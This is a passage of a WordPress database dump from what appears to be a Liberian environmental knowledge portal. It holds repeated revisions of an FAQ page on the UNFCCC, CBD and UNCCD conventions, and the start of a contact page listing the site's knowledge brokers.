in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:48:27','2019-11-16 19:48:27','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2525,1,'2019-11-16 19:49:49','2019-11-16 19:49:49','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:49:49','2019-11-16 19:49:49','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2526,1,'2019-11-16 19:53:16','2019-11-16 19:53:16','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n												<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n					<p>Use the smart search feature on the homepage to search for keywords or better still select a category.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:53:16','2019-11-16 19:53:16','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2527,1,'2019-11-16 19:54:30','2019-11-16 19:54:30','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n												<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n					<p>Use the smart search feature on the homepage to search for keywords or better still select a category.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:54:30','2019-11-16 19:54:30','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (2528,1,'2019-11-16 19:56:27','2019-11-16 19:56:27','<h2>GENERAL</h2>\n<a href=\"\">What is the EKMS?</a>\n\nThe Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other&nbsp; Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.\n\nIt focuses on how the Rio conventions are being implementation in Liberia.\n\n<a href=\"\">Who can contribute to the EKMS?</a>\n\nGovernment Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.\n\n<a href=\"\">How can i discussion on topics?</a>\n\nJoin our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.\n\n<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n\nUse the smart search feature on the homepage to search for keywords or better still select a category.\n<h2>UNFCCC</h2>\n<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n\nAccreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.\n\n<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n\nAll official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.\n\n<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n\nNo, each participant must be properly accredited and registered.\n\n<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n\nThere are different participation groups at UNFCCC meetings; these include:\n<ol>\n 	<li><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the&nbsp;<a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</li>\n 	<li><strong>Observers</strong>&nbsp;from admitted&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a>&nbsp;or&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a>&nbsp;organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the&nbsp;<a href=\"https://onlinereg.unfccc.int/\">online registration system</a>&nbsp;(ORS). Please see the&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a>&nbsp;web page for more information.</li>\n 	<li><strong>Observer</strong>&nbsp;from a United Nations organization or specialized agency. Nominations are received from the respective organization.</li>\n 	<li><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the&nbsp;<a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</li>\n</ol>\n<a href=\"\">What is the purpose of the UNFCCC?</a>\n\nThe&nbsp;UN Framework Convention on Climate Change&nbsp;(UNFCCC) is an intergovernmental treaty developed to address the problem of&nbsp;climate change.\n\n<a href=\"\">What is climate neutrality?</a>\n\nClimate neutrality is achieved by balancing the amount of emissions generated with the Earth’s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.\n<h2>UNCBD</h2>\n<a href=\"\">What is the UNCBD?</a>\n\nThe&nbsp;Convention on Biological Diversity&nbsp;(CBD)&nbsp;is&nbsp;an international legally-binding treaty with three main goals: conservation of&nbsp;biodiversity; sustainable use of&nbsp;biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.\n\n<a href=\"\">What is conservation of biodiversity?</a>\n\nConservation of biological diversity&nbsp;leads to&nbsp;conservation&nbsp;of essential ecological&nbsp;diversity&nbsp;to preserve the continuity of food chains. The genetic&nbsp;diversity&nbsp;of plants and animals is preserved. Biodiversity conservation&nbsp;serves as an insurance policy for the future.\n\n<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n\nBiodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.\n\n<a href=\"\">How can we protect and preserve biodiversity?</a>\n\nSupport the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and&nbsp;protect&nbsp;beaches, parks, reserves, and fields where wild plants and animals live.\n\n<a href=\"\">What are some factors that affect biodiversity?</a>\n\nThe loss of&nbsp;biodiversity affects the lives of more than 1 billion people living in dry lands.\n5 major threats to biodiversity;\nClimate change\nDeforestation and habitat loss\nOver-exploitation\nInvasive species\nPollution\n<h2>UNCCD</h2>\n<a href=\"\">What is the importance of the UNCCD?</a>\n\nThe&nbsp;United Nations Convention to Combat Desertification&nbsp;in Those&nbsp;Countries&nbsp;Experiencing Serious Drought and/or&nbsp;Desertification, Particularly in Africa (UNCCD) is a&nbsp;Convention to combat desertification&nbsp;and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by&nbsp;international cooperation and partnership arrangements.\n\n<a href=\"\">Is the UNCCD legally binding?</a>\n\nEstablished in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management\n\n<a href=\"\">What is desertification?</a>\n\nDesertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.\n\n<a href=\"\">Why is it important to combat desertification?</a>\n\nDesertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land’s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined – are at risk of being displaced as a consequence of desertification.\n\n<a href=\"\">Is desertification a global problem?</a>\n\nDesertification is a worldwide problem directly affecting 250 million people and a third of the earth’s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world’s poorest in over one hundred countries are threatened.','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:56:27','2019-11-16 19:56:27','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2529,1,'2019-11-16 20:03:55','2019-11-16 20:03:55','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, 